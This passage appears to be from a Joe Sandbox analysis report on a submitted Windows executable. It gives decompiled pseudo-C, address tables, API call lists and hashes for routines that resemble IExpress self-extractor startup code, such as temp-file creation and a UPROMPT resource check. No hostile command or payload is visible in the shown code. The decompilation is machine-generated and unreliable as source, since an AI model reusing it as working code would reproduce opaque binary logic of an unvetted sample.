                                                                                                                                                                                                                                            							_push(0x8d10b4);
                                                                                                                                                                                                                                            							_push(0x8d10ac);
                                                                                                                                                                                                                                            							L008D7202();
                                                                                                                                                                                                                                            							 *0x8d88b0 = 2;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if(_t53 == 0) {
                                                                                                                                                                                                                                            							 *0x8d88ac = 0;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t71 =  *0x8d88b4;
                                                                                                                                                                                                                                            						if( *0x8d88b4 != 0 && E008D7060(_t71, 0x8d88b4) != 0) {
                                                                                                                                                                                                                                            							_t60 =  *0x8d88b4; // 0x0
                                                                                                                                                                                                                                            							 *0x8da288(0, 2, 0);
                                                                                                                                                                                                                                            							 *_t60();
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t25 = __imp___acmdln; // 0x76235b9c
                                                                                                                                                                                                                                            						_t59 =  *_t25;
                                                                                                                                                                                                                                            						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                            							_t41 =  *_t59;
                                                                                                                                                                                                                                            							if(_t41 > 0x20) {
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							if(_t41 != 0) {
                                                                                                                                                                                                                                            								if(_t54 != 0) {
                                                                                                                                                                                                                                            									goto L32;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                                                            										_t59 = _t59 + 1;
                                                                                                                                                                                                                                            										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            										_t41 =  *_t59;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                                                            							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                                                            								_t29 = 0xa;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push(_t29);
                                                                                                                                                                                                                                            							_t30 = E008D2BFB(0x8d0000, 0, _t59); // executed
                                                                                                                                                                                                                                            							 *0x8d81e0 = _t30;
                                                                                                                                                                                                                                            							__eflags =  *0x8d81f8;
                                                                                                                                                                                                                                            							if( *0x8d81f8 == 0) {
                                                                                                                                                                                                                                            								exit(_t30); // executed
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags =  *0x8d81e4;
                                                                                                                                                                                                                                            							if( *0x8d81e4 == 0) {
                                                                                                                                                                                                                                            								__imp___cexit();
                                                                                                                                                                                                                                            								_t30 =  *0x8d81e0; // 0x80070002
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                            							goto L40;
                                                                                                                                                                                                                                            							L32:
                                                                                                                                                                                                                                            							__eflags = _t41 - 0x22;
                                                                                                                                                                                                                                            							if(_t41 == 0x22) {
                                                                                                                                                                                                                                            								__eflags = _t54;
                                                                                                                                                                                                                                            								_t15 = _t54 == 0;
                                                                                                                                                                                                                                            								__eflags = _t15;
                                                                                                                                                                                                                                            								_t54 = 0 | _t15;
                                                                                                                                                                                                                                            								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                                                            							__imp___ismbblead(_t26);
                                                                                                                                                                                                                                            							__eflags = _t26;
                                                                                                                                                                                                                                            							if(_t26 != 0) {
                                                                                                                                                                                                                                            								_t59 = _t59 + 1;
                                                                                                                                                                                                                                            								__eflags = _t59;
                                                                                                                                                                                                                                            								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t59 = _t59 + 1;
                                                                                                                                                                                                                                            							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L40:
                                                                                                                                                                                                                                            					return E008D724D(_t30);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t58 = 1;
                                                                                                                                                                                                                                            				__eflags = 1;
                                                                                                                                                                                                                                            				goto L7;
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x008d6a60
                                                                                                                                                                                                                                            0x008d6a6a
                                                                                                                                                                                                                                            0x008d6a6c
                                                                                                                                                                                                                                            0x008d6a71
                                                                                                                                                                                                                                            0x008d6a78
                                                                                                                                                                                                                                            0x008d6a7f
                                                                                                                                                                                                                                            0x008d6a85
                                                                                                                                                                                                                                            0x008d6a8e
                                                                                                                                                                                                                                            0x008d6a91
                                                                                                                                                                                                                                            0x008d6a93
                                                                                                                                                                                                                                            0x008d6a9c
                                                                                                                                                                                                                                            0x008d6aa2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d6aa6
                                                                                                                                                                                                                                            0x008d6ab4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d6aa8
                                                                                                                                                                                                                                            0x008d6aaa
                                                                                                                                                                                                                                            0x008d6aab
                                                                                                                                                                                                                                            0x008d6aab
                                                                                                                                                                                                                                            0x008d6abf
                                                                                                                                                                                                                                            0x008d6abf
                                                                                                                                                                                                                                            0x008d6ac5
                                                                                                                                                                                                                                            0x008d6ad1
                                                                                                                                                                                                                                            0x008d6ad7
                                                                                                                                                                                                                                            0x008d6b05
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d6ad9
                                                                                                                                                                                                                                            0x008d6ad9
                                                                                                                                                                                                                                            0x008d6ae9
                                                                                                                                                                                                                                            0x008d6af0
                                                                                                                                                                                                                                            0x008d6af2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d6af4
                                                                                                                                                                                                                                            0x008d6af4
                                                                                                                                                                                                                                            0x008d6afb
                                                                                                                                                                                                                                            0x008d6afb
                                                                                                                                                                                                                                            0x008d6af2
                                                                                                                                                                                                                                            0x008d6ac7
                                                                                                                                                                                                                                            0x008d6ac7
                                                                                                                                                                                                                                            0x008d6ac9
                                                                                                                                                                                                                                            0x008d6b0b
                                                                                                                                                                                                                                            0x008d6b0b
                                                                                                                                                                                                                                            0x008d6b11
                                                                                                                                                                                                                                            0x008d6b13
                                                                                                                                                                                                                                            0x008d6b18
                                                                                                                                                                                                                                            0x008d6b1d
                                                                                                                                                                                                                                            0x008d6b24
                                                                                                                                                                                                                                            0x008d6b24
                                                                                                                                                                                                                                            0x008d6b30
                                                                                                                                                                                                                                            0x008d6b39
                                                                                                                                                                                                                                            0x008d6b39
                                                                                                                                                                                                                                            0x008d6b3b
                                                                                                                                                                                                                                            0x008d6b42
                                                                                                                                                                                                                                            0x008d6b57
                                                                                                                                                                                                                                            0x008d6b5f
                                                                                                                                                                                                                                            0x008d6b65
                                                                                                                                                                                                                                            0x008d6b65
                                                                                                                                                                                                                                            0x008d6b67
                                                                                                                                                                                                                                            0x008d6b6c
                                                                                                                                                                                                                                            0x008d6b6e
                                                                                                                                                                                                                                            0x008d6b71
                                                                                                                                                                                                                                            0x008d6b74
                                                                                                                                                                                                                                            0x008d6b74
                                                                                                                                                                                                                                            0x008d6b79
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d6b7d
                                                                                                                                                                                                                                            0x008d6b81
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d6b83
                                                                                                                                                                                                                                            0x008d6b8c
                                                                                                                                                                                                                                            0x008d6b8d
                                                                                                                                                                                                                                            0x008d6b90
                                                                                                                                                                                                                                            0x008d6b90
                                                                                                                                                                                                                                            0x008d6b83
                                                                                                                                                                                                                                            0x008d6b81
                                                                                                                                                                                                                                            0x008d6b94
                                                                                                                                                                                                                                            0x008d6b98
                                                                                                                                                                                                                                            0x008d6ba2
                                                                                                                                                                                                                                            0x008d6b9a
                                                                                                                                                                                                                                            0x008d6b9a
                                                                                                                                                                                                                                            0x008d6b9a
                                                                                                                                                                                                                                            0x008d6ba3
                                                                                                                                                                                                                                            0x008d6bab
                                                                                                                                                                                                                                            0x008d6bb0
                                                                                                                                                                                                                                            0x008d6bb5
                                                                                                                                                                                                                                            0x008d6bbc
                                                                                                                                                                                                                                            0x008d6bbf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d6bbf
                                                                                                                                                                                                                                            0x008d6c1e
                                                                                                                                                                                                                                            0x008d6c25
                                                                                                                                                                                                                                            0x008d6c27
                                                                                                                                                                                                                                            0x008d6c2d
                                                                                                                                                                                                                                            0x008d6c2d
                                                                                                                                                                                                                                            0x008d6c32
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d6bc5
                                                                                                                                                                                                                                            0x008d6bc5
                                                                                                                                                                                                                                            0x008d6bc8
                                                                                                                                                                                                                                            0x008d6bcc
                                                                                                                                                                                                                                            0x008d6bce
                                                                                                                                                                                                                                            0x008d6bce
                                                                                                                                                                                                                                            0x008d6bd1
                                                                                                                                                                                                                                            0x008d6bd3
                                                                                                                                                                                                                                            0x008d6bd3
                                                                                                                                                                                                                                            0x008d6bd6
                                                                                                                                                                                                                                            0x008d6bda
                                                                                                                                                                                                                                            0x008d6be1
                                                                                                                                                                                                                                            0x008d6be3
                                                                                                                                                                                                                                            0x008d6be5
                                                                                                                                                                                                                                            0x008d6be5
                                                                                                                                                                                                                                            0x008d6be6
                                                                                                                                                                                                                                            0x008d6be6
                                                                                                                                                                                                                                            0x008d6be9
                                                                                                                                                                                                                                            0x008d6bea
                                                                                                                                                                                                                                            0x008d6bea
                                                                                                                                                                                                                                            0x008d6b74
                                                                                                                                                                                                                                            0x008d6c39
                                                                                                                                                                                                                                            0x008d6c3e
                                                                                                                                                                                                                                            0x008d6c3e
                                                                                                                                                                                                                                            0x008d6abe
                                                                                                                                                                                                                                            0x008d6abe
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 008D7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 008D7182
                                                                                                                                                                                                                                              • Part of subcall function 008D7155: GetCurrentProcessId.KERNEL32 ref: 008D7191
                                                                                                                                                                                                                                              • Part of subcall function 008D7155: GetCurrentThreadId.KERNEL32 ref: 008D719A
                                                                                                                                                                                                                                              • Part of subcall function 008D7155: GetTickCount.KERNEL32 ref: 008D71A3
                                                                                                                                                                                                                                              • Part of subcall function 008D7155: QueryPerformanceCounter.KERNEL32(?), ref: 008D71B8
                                                                                                                                                                                                                                            • GetStartupInfoW.KERNEL32(?,008D72B8,00000058), ref: 008D6A7F
                                                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 008D6AB4
                                                                                                                                                                                                                                            • _amsg_exit.MSVCRT ref: 008D6AC9
                                                                                                                                                                                                                                            • _initterm.MSVCRT ref: 008D6B1D
                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 008D6B49
                                                                                                                                                                                                                                            • exit.KERNELBASE ref: 008D6BBF
                                                                                                                                                                                                                                            • _ismbblead.MSVCRT ref: 008D6BDA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 836923961-0
                                                                                                                                                                                                                                            • Opcode ID: de6659a172fd2e2bca771c07cac27641ba5292316a5e322c9b9054f6674093ed
                                                                                                                                                                                                                                            • Instruction ID: 55a5b231617b6fab2c256a749597afbb49dc322b8666b6ea0cc7864fc3ae3e10
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: de6659a172fd2e2bca771c07cac27641ba5292316a5e322c9b9054f6674093ed
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9841EF3194576DDFDB21AB69D805B6A77A0FB44730F24032BE842E3390EF744C519B81
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 631 8d58c8-8d58d5 632 8d58d8-8d58dd 631->632 632->632 633 8d58df-8d58f1 LocalAlloc 632->633 634 8d5919-8d5959 call 8d1680 call 8d658a CreateFileA LocalFree 633->634 635 8d58f3-8d5901 call 8d44b9 633->635 638 8d5906-8d5910 call 8d6285 634->638 644 8d595b-8d596c CloseHandle GetFileAttributesA 634->644 635->638 645 8d5912-8d5918 638->645 644->638 646 8d596e-8d5970 644->646 646->638 647 8d5972-8d597b 646->647 647->645
                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E008D58C8(intOrPtr* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				intOrPtr _t6;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				signed char _t16;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				intOrPtr* _t27;
                                                                                                                                                                                                                                            				CHAR* _t33;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_t33 = __ecx;
                                                                                                                                                                                                                                            				_t27 = __ecx;
                                                                                                                                                                                                                                            				_t23 = __ecx + 1;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t6 =  *_t27;
                                                                                                                                                                                                                                            					_t27 = _t27 + 1;
                                                                                                                                                                                                                                            				} while (_t6 != 0);
                                                                                                                                                                                                                                            				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                                                            				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                                                            				if(_t20 != 0) {
                                                                                                                                                                                                                                            					E008D1680(_t20, _t36, _t33);
                                                                                                                                                                                                                                            					E008D658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                                                            					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                                                            					_v8 = _t10;
                                                                                                                                                                                                                                            					LocalFree(_t20);
                                                                                                                                                                                                                                            					_t12 = _v8;
                                                                                                                                                                                                                                            					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                                                            						goto L4;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						CloseHandle(_t12);
                                                                                                                                                                                                                                            						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                                                            						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							 *0x8d9124 = 0;
                                                                                                                                                                                                                                            							_t14 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E008D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                                            					 *0x8d9124 = E008D6285();
                                                                                                                                                                                                                                            					_t14 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t14;
                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                            0x008d58cd
                                                                                                                                                                                                                                            0x008d58d1
                                                                                                                                                                                                                                            0x008d58d3
                                                                                                                                                                                                                                            0x008d58d5
                                                                                                                                                                                                                                            0x008d58d8
                                                                                                                                                                                                                                            0x008d58d8
                                                                                                                                                                                                                                            0x008d58da
                                                                                                                                                                                                                                            0x008d58db
                                                                                                                                                                                                                                            0x008d58e1
                                                                                                                                                                                                                                            0x008d58ed
                                                                                                                                                                                                                                            0x008d58f1
                                                                                                                                                                                                                                            0x008d591e
                                                                                                                                                                                                                                            0x008d592c
                                                                                                                                                                                                                                            0x008d5943
                                                                                                                                                                                                                                            0x008d594a
                                                                                                                                                                                                                                            0x008d594d
                                                                                                                                                                                                                                            0x008d5953
                                                                                                                                                                                                                                            0x008d5959
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d595b
                                                                                                                                                                                                                                            0x008d595c
                                                                                                                                                                                                                                            0x008d5963
                                                                                                                                                                                                                                            0x008d596c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5972
                                                                                                                                                                                                                                            0x008d5974
                                                                                                                                                                                                                                            0x008d597a
                                                                                                                                                                                                                                            0x008d597a
                                                                                                                                                                                                                                            0x008d596c
                                                                                                                                                                                                                                            0x008d58f3
                                                                                                                                                                                                                                            0x008d5901
                                                                                                                                                                                                                                            0x008d5906
                                                                                                                                                                                                                                            0x008d590b
                                                                                                                                                                                                                                            0x008d5910
                                                                                                                                                                                                                                            0x008d5910
                                                                                                                                                                                                                                            0x008d5918

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,008D5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D58E7
                                                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,008D5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D5943
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,008D5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D594D
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,008D5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D595C
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,008D5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D5963
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                                                                                                                                                                                                                                            • API String ID: 747627703-1664176527
                                                                                                                                                                                                                                            • Opcode ID: 371714b0e9983b3a55df0bb426d550a038876766f3901d5c9122433f64b195f0
                                                                                                                                                                                                                                            • Instruction ID: 68092119a4eb7de3ef273155167edf6530a9f3dc72f25b689e3627cc4665394e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 371714b0e9983b3a55df0bb426d550a038876766f3901d5c9122433f64b195f0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A110031602220BBCB281F7EAC4EE9B7F99FF46370B200717F51AD2381DA748C0582A0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E008D51E5(void* __eflags) {
                                                                                                                                                                                                                                            				int _t5;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t1 = E008D468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                            				if(_t28 != 0) {
                                                                                                                                                                                                                                            					if(E008D468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                                                            						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                                                            						if(_t5 != 0) {
                                                                                                                                                                                                                                            							_t6 = E008D44B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                                                            							LocalFree(_t28);
                                                                                                                                                                                                                                            							if(_t6 != 6) {
                                                                                                                                                                                                                                            								 *0x8d9124 = 0x800704c7;
                                                                                                                                                                                                                                            								L10:
                                                                                                                                                                                                                                            								return 0;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							 *0x8d9124 = 0;
                                                                                                                                                                                                                                            							L6:
                                                                                                                                                                                                                                            							return 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						LocalFree(_t28);
                                                                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					E008D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					LocalFree(_t28);
                                                                                                                                                                                                                                            					 *0x8d9124 = 0x80070714;
                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E008D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            				 *0x8d9124 = E008D6285();
                                                                                                                                                                                                                                            				goto L10;
                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                            0x008d51fb
                                                                                                                                                                                                                                            0x008d5207
                                                                                                                                                                                                                                            0x008d520b
                                                                                                                                                                                                                                            0x008d523c
                                                                                                                                                                                                                                            0x008d5268
                                                                                                                                                                                                                                            0x008d5270
                                                                                                                                                                                                                                            0x008d528b
                                                                                                                                                                                                                                            0x008d5293
                                                                                                                                                                                                                                            0x008d529c
                                                                                                                                                                                                                                            0x008d52a6
                                                                                                                                                                                                                                            0x008d52b0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d52b0
                                                                                                                                                                                                                                            0x008d529e
                                                                                                                                                                                                                                            0x008d5279
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d527b
                                                                                                                                                                                                                                            0x008d5273
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5273
                                                                                                                                                                                                                                            0x008d524a
                                                                                                                                                                                                                                            0x008d5250
                                                                                                                                                                                                                                            0x008d5256
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5256
                                                                                                                                                                                                                                            0x008d5219
                                                                                                                                                                                                                                            0x008d5223
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008D46A0
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: SizeofResource.KERNEL32(00000000,00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46A9
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008D46C3
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: LoadResource.KERNEL32(00000000,00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46CC
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: LockResource.KERNEL32(00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46D3
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: memcpy_s.MSVCRT ref: 008D46E5
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,008D2F4D,?,00000002,00000000), ref: 008D5201
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 008D5250
                                                                                                                                                                                                                                              • Part of subcall function 008D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008D4518
                                                                                                                                                                                                                                              • Part of subcall function 008D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 008D4554
                                                                                                                                                                                                                                              • Part of subcall function 008D6285: GetLastError.KERNEL32(008D5BBC), ref: 008D6285
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$UPROMPT
                                                                                                                                                                                                                                            • API String ID: 957408736-2980973527
                                                                                                                                                                                                                                            • Opcode ID: 5954bbc6725c30be4bea322df573935945e5a0f1bf370da87be7f2480bbdd4f4
                                                                                                                                                                                                                                            • Instruction ID: 0913b50459b7a428c4829243670df784f94f6c05fd238b68dd83778e62dbdc3b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5954bbc6725c30be4bea322df573935945e5a0f1bf370da87be7f2480bbdd4f4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4A110871242605BBE7186BB55C4AF3B739EFB89754F10432BF642D6390EA7D8C044125
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 74%
                                                                                                                                                                                                                                            			E008D52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed int _t11;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                                            				CHAR** _t31;
                                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t28 = __edi;
                                                                                                                                                                                                                                            				_t22 = __ecx;
                                                                                                                                                                                                                                            				_t21 = __ebx;
                                                                                                                                                                                                                                            				_t9 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t9 ^ _t33;
